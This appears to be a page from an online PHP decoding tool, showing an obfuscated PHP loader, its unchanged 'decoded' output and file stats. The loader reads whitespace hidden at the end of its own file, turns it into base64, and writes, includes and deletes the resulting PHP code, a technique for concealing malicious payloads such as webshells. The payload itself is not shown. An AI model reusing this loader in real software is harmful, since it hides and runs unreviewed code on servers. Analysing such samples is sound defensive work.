Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$c=end(preg_split('/;/',file_get_contents('./'.basename($_SERVER['PHP_SELF']))));for ($i=0..

Decoded Output download

$c=end(preg_split('/;/',file_get_contents('./'.basename($_SERVER['PHP_SELF']))));for ($i=0;$i<strlen($c);$i++){$out.=chr(bindec(str_replace(array(chr(9),chr(32)),array('1','0'),substr($c,$i,8))));$i+=7;}$c=" ";file_put_contents($c, ' <?php '.base64_decode($out));include $c;unlink($c); ?>

Did this file decode correctly?

Original Code

$c=end(preg_split('/;/',file_get_contents('./'.basename($_SERVER['PHP_SELF']))));for ($i=0;$i<strlen($c);$i++){$out.=chr(bindec(str_replace(array(chr(9),chr(32)),array('1','0'),substr($c,$i,8))));$i+=7;}$c=" ";file_put_contents($c, ' <?php '.base64_decode($out));include $c;unlink($c);

Function Calls

None

Variables

None

Stats

MD5 43fbb61c398f61975c301df4e82c04ee
Eval Count 0
Decode Time 77 ms